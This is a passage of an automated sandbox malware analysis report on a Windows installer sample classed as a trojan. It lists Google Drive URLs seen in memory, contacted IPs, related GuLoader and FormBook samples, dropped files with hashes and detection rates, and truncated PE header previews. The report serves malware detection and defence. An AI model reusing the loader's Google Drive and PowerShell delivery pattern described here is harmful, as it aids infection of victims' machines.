00000006.00000003.2879946897.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2581207488.0000000005EA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdAnthranil.exe, 00000006.00000001.2413832004.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
                                      		high
                                      https://drive.google.com/d.google.comAnthranil.exe, 00000006.00000003.2799683039.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2810739376.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2822415683.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2603833108.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2845242537.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2672435142.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2731145065.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2718935201.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2649753153.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2695758032.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2638305597.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2891797419.0000000005EA4000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2869016490.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2833248733.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2707422994.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2626671600.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2879946897.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2615437730.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2684261462.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2788122541.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2856173350.0000000005EA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://drive.google.com/Anthranil.exe, 00000006.00000003.3004468843.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2684305199.0000000005EDA000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://drive.google.com/ertificatesAnthranil.exe, 00000006.00000003.2603833108.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2615437730.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2592673124.0000000005EA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214Anthranil.exe, 00000006.00000001.2413832004.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                                              		high
                                              http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdAnthranil.exe, 00000006.00000001.2413832004.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
                                                		high
                                                https://drive.google.com/.Anthranil.exe, 00000006.00000003.2936308090.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2799683039.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2810739376.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2822415683.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2845242537.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2731145065.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2924930142.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2891797419.0000000005EA4000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2869016490.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2947348025.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2833248733.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2879946897.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000002.3013439177.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2719480758.0000000005EE0000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2695758032.0000000005EE0000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2970146989.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2684261462.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2707500476.0000000005EE0000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2788122541.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2856173350.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2765624883.0000000005EA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://drive.google.com/crosoftAnthranil.exe, 00000006.00000003.2777342764.0000000005EA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://drive.google.com/1&0Anthranil.exe, 00000006.00000003.2603833108.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2615437730.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2592673124.0000000005EA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://apis.google.comAnthranil.exe, 00000006.00000002.3013439177.0000000005E82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://drive.google.com/riveAnthranil.exe, 00000006.00000003.2731145065.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2742139208.0000000005EA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://drive.google.com/&Anthranil.exe, 00000006.00000003.2936308090.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2799683039.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2810739376.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2822415683.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2845242537.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2924930142.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2891797419.0000000005EA4000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2869016490.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2947348025.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2833248733.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2879946897.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000002.3013439177.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2970146989.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2856173350.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2981683074.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2914441562.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2992682795.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2903050718.0000000005EA4000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2958843876.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.3004468843.0000000005EA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://drive.google.com/%Anthranil.exe, 00000006.00000003.2936308090.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2799683039.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2810739376.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2822415683.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2845242537.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2731145065.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2924930142.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2891797419.0000000005EA4000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2869016490.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2947348025.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2833248733.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2879946897.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000002.3013439177.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2970146989.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2788122541.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2856173350.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2765624883.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2981683074.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2914441562.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2992682795.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2903050718.0000000005EA4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high

                                                              World Map of Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public IPs

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              142.250.185.129
                                                              		drive.usercontent.google.comUnited States
                                                              		15169GOOGLEUSfalse
                                                              216.58.206.46
                                                              		drive.google.comUnited States
                                                              		15169GOOGLEUSfalse

                                                              General Information

                                                              Joe Sandbox version:42.0.0 Malachite
                                                              Analysis ID:1588781
                                                              Start date and time:2025-01-11 05:27:11 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 6m 16s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:8
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:AM983ebb5F.exe
                                                              renamed because original name is a hash value
                                                              Original Sample Name:d7e1f00ddf7e5b61046566992a771ff1ae5b99ac2df6c906b7cde3d24c611875.exe
                                                              Detection:MAL
                                                              Classification:mal100.troj.evad.winEXE@6/13@2/2
                                                              EGA Information:
                                                              • Successful, ratio: 50%
                                                              HCA Information:
                                                              • Successful, ratio: 99%
                                                              • Number of executed functions: 36
                                                              • Number of non-executed functions: 31
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe

                                                              Warnings

                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                              • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45
                                                              • Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                                              Simulations

                                                              Behavior and APIs

                                                              TimeTypeDescription
                                                              23:28:11API Interceptor39x Sleep call for process: powershell.exe modified
                                                              23:29:32API Interceptor19x Sleep call for process: Anthranil.exe modified

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              No context

                                                              Domains

                                                              No context

                                                              ASNs

                                                              No context

                                                              JA3 Fingerprints

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              37f463bf4616ecd445d4a1937da06e19QNuQ5e175D.exeGet hashmaliciousGuLoaderBrowse
                                                              • 142.250.185.129
                                                              • 216.58.206.46
                                                              7uY105UTJU.exeGet hashmaliciousGuLoaderBrowse
                                                              • 142.250.185.129
                                                              • 216.58.206.46
                                                              QNuQ5e175D.exeGet hashmaliciousGuLoaderBrowse
                                                              • 142.250.185.129
                                                              • 216.58.206.46
                                                              iwEnYIOol8.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                              • 142.250.185.129
                                                              • 216.58.206.46
                                                              Ntwph4urc1.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                              • 142.250.185.129
                                                              • 216.58.206.46
                                                              2976587-987347589.07.exeGet hashmaliciousNitol, XmrigBrowse
                                                              • 142.250.185.129
                                                              • 216.58.206.46
                                                              2976587-987347589.08.exeGet hashmaliciousNitolBrowse
                                                              • 142.250.185.129
                                                              • 216.58.206.46
                                                              Ntwph4urc1.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                              • 142.250.185.129
                                                              • 216.58.206.46
                                                              2976587-987347589.08.exeGet hashmaliciousUnknownBrowse
                                                              • 142.250.185.129
                                                              • 216.58.206.46
                                                              yMXFgPOdf2.exeGet hashmaliciousGuLoaderBrowse
                                                              • 142.250.185.129
                                                              • 216.58.206.46

                                                              Dropped Files

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              C:\Users\user\AppData\Local\Temp\nsuD53D.tmp\nsExec.dll7uY105UTJU.exeGet hashmaliciousGuLoaderBrowse
                                                                iwEnYIOol8.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  678763_PDF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                    file.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                      Shipping documents 000022999878999800009999.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        Ze1Ueabtx5.imgGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                          Documenti di spedizione 0009333000459595995.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                            4hIPvzV6a2.exeGet hashmaliciousUnknownBrowse
                                                                              SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exeGet hashmaliciousUnknownBrowse
                                                                                SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exeGet hashmaliciousUnknownBrowse

                                                                                  Created / dropped Files

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:modified
                                                                                  Size (bytes):53158
                                                                                  Entropy (8bit):5.062687652912555
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                                  MD5:5D430F1344CE89737902AEC47C61C930
                                                                                  SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                                  SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                                  SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                                  Malicious:false
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

                                                                                  C:\Users\user\AppData\Local\Temp\Anthranil.exe

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                  Category:dropped
                                                                                  Size (bytes):732452
                                                                                  Entropy (8bit):7.815204873069211
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:IfL/UfibuhAHWK1pKC4eCnFpS57Maa0sNa9GtKlQyYefZKSxA340ryKhz:IfL8fibuqH31OFEpMgsNOGtjexKj3v
                                                                                  MD5:03ABC55B8081DADF39D55EBD481BEF1C
                                                                                  SHA1:9B7DA36F4FED678308ED8F88BB0AE9797969F8F5
                                                                                  SHA-256:D7E1F00DDF7E5B61046566992A771FF1AE5B99AC2DF6C906B7CDE3D24C611875
                                                                                  SHA-512:2360E6635D1F44CF90BDF9FFECD6F3E08B1EC345077A0A4830477841F34FE7430718C2A82771475DC7032C3B3E4E714D56F1F96256F0766A96206B8A1071A2A7
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                  • Antivirus: Virustotal, Detection: 69%, Browse
                                                                                  Reputation:low
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...l.d.................j..........25............@.......................................@..........................................@...k...........................................................................................................text....h.......j.................. ..`.rdata..d............n..............@..@.data...............................@....ndata.......P...........................rsrc....k...@...l..................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\Anthranil.exe:Zone.Identifier

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):26
                                                                                  Entropy (8bit):3.95006375643621
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                  Malicious:false
                                                                                  Reputation:high, very likely benign file
                                                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j22mjruf.whq.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Reputation:high, very likely benign file
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lrruocdi.s1p.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m5xx41dt.slu.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xpg05oh2.zml.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\nsuD53D.tmp\nsExec.dll

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\AM983ebb5F.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):7168
                                                                                  Entropy (8bit):5.2959870663251625
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:JwzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuH0DQ:JTQHDb2vSuOc41ZfUNQZGdHM
                                                                                  MD5:B4579BC396ACE8CAFD9E825FF63FE244
                                                                                  SHA1:32A87ED28A510E3B3C06A451D1F3D0BA9FAF8D9C
                                                                                  SHA-256:01E72332362345C415A7EDCB366D6A1B52BE9AC6E946FB9DA49785C140BA1A4B
                                                                                  SHA-512:3A76E0E259A0CA12275FED922CE6E01BDFD9E33BA85973E80101B8025EF9243F5E32461A113BBCC6AA75E40894BB5D3A42D6B21045517B6B3CF12D76B4CFA36A
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                  Joe Sandbox View:
                                                                                  • Filename: 7uY105UTJU.exe, Detection: malicious, Browse
                                                                                  • Filename: iwEnYIOol8.exe, Detection: malicious, Browse
                                                                                  • Filename: 678763_PDF.exe, Detection: malicious, Browse
                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                  • Filename: Shipping documents 000022999878999800009999.exe, Detection: malicious, Browse
                                                                                  • Filename: Ze1Ueabtx5.img, Detection: malicious, Browse
                                                                                  • Filename: Documenti di spedizione 0009333000459595995.exe, Detection: malicious, Browse
                                                                                  • Filename: 4hIPvzV6a2.exe, Detection: malicious, Browse
                                                                                  • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe, Detection: malicious, Browse
                                                                                  • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe, Detection: malicious, Browse
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L...Q.d...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Roaming\erstatningsgraden\Alternere.Mor

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\AM983ebb5F.exe
                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (4367), with CRLF, LF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):73501
                                                                                  Entropy (8bit):5.195629813908633
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:sGkALWrIgzzBfnQonRc64iqUBim9jCvB1o2oXzlUlBUJew:srcgzzptddq21PzlUlCj
                                                                                  MD5:C03317CCDAB0DBDB1CAE33F7B8E5F604
                                                                                  SHA1:11A8B9667E5426B6663362A41AAF69AF2DCC753C
                                                                                  SHA-256:0F564121D89F2527C16C123D0A5A22112D9899B4AFDDAB264A78C2BC22F6AB9B
                                                                                  SHA-512:ED27908E9178F57614565EE62F7582BBFC9A5A55A2BF0695719B8AFB02AA288FF065915358DF95744A29E9E896335C078C2F939B95811DB1CDE91B39ACCD13F8
                                                                                  Malicious:true
